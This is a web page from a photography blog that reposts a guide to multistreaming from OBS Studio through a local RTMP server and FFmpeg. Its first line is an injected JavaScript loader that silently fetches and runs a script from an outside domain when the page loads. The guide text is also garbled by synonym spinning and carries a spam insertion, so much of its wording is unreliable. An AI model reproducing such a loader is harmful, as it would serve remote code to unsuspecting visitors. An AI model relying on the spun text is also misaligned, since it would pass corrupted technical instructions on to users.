;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); OBS Business: Stream so you can numerous platforms or streams at a time – Eydís — Ljósmyndun

OBS Business: Stream so you can numerous platforms or streams at a time

OBS Business: Stream so you can numerous platforms or streams at a time

UPD azing SoraYuki composed their obs-multi-rtmp plug-in, you really don’t need this article any more, because plugin is a lot easier to utilize. For example, less difficult. But if you you want FFmpeg filter systems, or if you need output during the different physical stature pricing, read on.

Before you could comprehend, please be aware this is of use if the a 3rd party services such as will not work for you. Together with, some of the harder configurations need a good facts out-of command-line FFmpeg. If you like let to suit your specific options, ping Nakajima Megumi#7432 from the obsproject assistance Dissension.

You’ll find numerous possibilities for this

The entire tip is really as uses: server an effective RTMP host on your computer, stream to that particular server, then have fun with FFmpeg to reproduce new stream to help you as numerous online streaming networks since you need in order to, with otherwise as opposed to reencoding.

The only I recommend physically to own Screen try MonaServer, as it’s seemingly painless to arrange – only pull and you can work on. Obtain it right here: Extract it, up coming launch MonaServer.exe regarding the order range. Example command:

Feel free to skip error texts perhaps not strongly related to the fresh new RTMP host running on port 1935. This can machine an effective RTMP host on the Screen Desktop; by default, simply you should be able to weight in order to they if you do not pass vent 1935. If you are playing with Linux, otherwise you desire to created a more element-rich machine, you need to use the publication off dodgepong, here

In the OBS Facility, duplicate your existing real time-streaming profile from the clicking Profiles > Backup. This can enable you to easily undo all change, if you would like.

If you don’t have FFmpeg strung but really, to visit and you can down load the fresh 64-piece static create. Extract ffmpeg.exe, ffprobe.exe and you will ffplay.exe to the same folder for which you has MonaServer.exe. Now, let’s verify that the fresh new load try real time.

Since I am enjoying my own personal stream, We see a video clip opinions feeling. Don’t be concerned regarding large weight slow down, much of it originated ffplay’s buffering, RTMP would be to present on the 800 ms from additional latency at worst, 100-2 hundred ms typically. Quit ffplay by the striking q with its windows otherwise Ctrl+C on order range windows where you produced it.

Now you need your stream tactics and particular full highway for each and every broadcast you wish to focus on. Such as, Twitch’s take-in machine inside the France can be obtained at rtmp://live-fra.twitch.tv/app/ and you may Youtube’s number 1 take in host try rtmp://a great.rtmp.youtube/live2 . What this means is that your full enjoy highway to possess broadcasting into the Twitch is rtmp://live-fra.twitch.tv/app/my-stream-trick, in which my personal-stream-secret is your complete weight secret. To see an entire directory of absorb server OBS Business reveals, understand .

Observe that I will use line holidays to get more much easier reading-in analogy sales; make an effort to remove them.

To achieve that, would a different CMD or Powershell window and furfling Dating Site make use of ffplay from your own install off ffmpeg:

For it, you really need to release yet another FFmpeg eg per service. This boosts the full RAM and you will Central processing unit footprint quite. Just to illustrate demand to begin with online streaming to just one platform: ffmpeg -i rtmp://localhost:1935/live/stream -c:v duplicate -c:a duplicate -f flv rtmp://live-fra.twitch.tv/app/my-stream-trick You could stop the load of the possibly closure the fresh CMD/PowerShell window, otherwise by the pressing Ctrl+C. FFmpeg will endeavour to leave cleanly, that may be slow; if you wish to force-prevent FFmpeg, giving Ctrl+C five or maybe more times will cause a power-prevent.

To help you shown to help you numerous programs or channels immediately, we can utilize the “tee” method and independent play pathways towards the | character. Let us give it a try basic from the remuxing your neighborhood load and you may re-online streaming it to the individual host:

Imagine if we need to weight so you can Twitch from inside the 720p 60fps six mbps, in order to Youtube in 1080p 60fps 20 mbps. There are 2 an approach to approach so it – either weight in your town when you look at the high quality (target 100-230 mbps, or have fun with CQP) and perform one or two reencodes, a little increasing the results impact, or stream within the sometime price satisfactory for Youtube and you can reencode it getting Twitch, harming the standard of Twitch’s load.

When we have a leading-high quality regional weight and wish to perform a few x264 reencodes, staying all of our 160kbps music for streams, we’d become indicating outputs one after the other, along these lines:

Mention the addition of -vf “scale=” – it adds a video clip filter out so you’re able to downscale the newest weight to 720p having Twitch. I am just in case the latest enter in is 1080p 60fps, that’s exactly what Youtube can get.

Or, imagine if you may be streaming out-of OBS Facility at 20 mbps 1080p 60fps and would like to content new weight due to the fact-is always to Youtube, and you can reencode to help you 4 mbps 720p 31 fps to have Twitch:

Note the addition of -r 30 to drop out-of sixty fps to 29 fps. When your enter in is fps (6), you could potentially lose so you can by using -r step three .

Note with the FFmpeg options and you may preset choice: -predetermined veryfast selects this new x264 preset, “veryfast”. FFmpeg can also use NVENC which have -c:v h264_nvenc – if so, I would personally strongly recommend having fun with -preset sluggish (2-solution quality) into the all of the cards except Turing cards; into the Turing notes I’d recommend -preset head office (single citation top quality). Remember that on account of NVIDIA’s revenue limitations you could only use dos concurrent NVENC instruction towards the GeForce cards; trying to begin a 3rd one will toss an enthusiastic “out of memories” error (even although you have enough free VRAM). FFmpeg may also explore AMD AMF which have -c:v h264_amf , please refer to it papers for making use of AMF: ffmpeg -hide_banner -h encoder=h264_amf

This 1 demands a great knowledge of the new demand line program and you can FFmpeg. I shall attempt to describe they and gives instances, but if that doesn’t let, you may still need to sift through FFmpeg’s paperwork.

What if i get a high quality type in, cut it as-is to try to file, next reencode in order to 2 mbps and send to help you dos characteristics: Grab the stream ffmpeg -hide_flag -i rtmp://localhost:1935/live/load Save in your community -c:v backup -c:a duplicate -f mp4 resource.mp4 Reencode that have one or two outputs -c:v libx264 -b:v 2000k -c:a copy -map 0 -f tee “[f=flv]rtmp://live-fra.twitch.tv/app/my-stream-key|[f=flv]rtmp://live-fra.twitch.tv/app/my-second-stream-key”

If you’d like let for the specific setup, or some components of this new publication is actually uncertain, ping Nakajima Megumi#7432 in the obsproject Discord with your inquiries.

Leave a Reply

Your email address will not be published. Required fields are marked *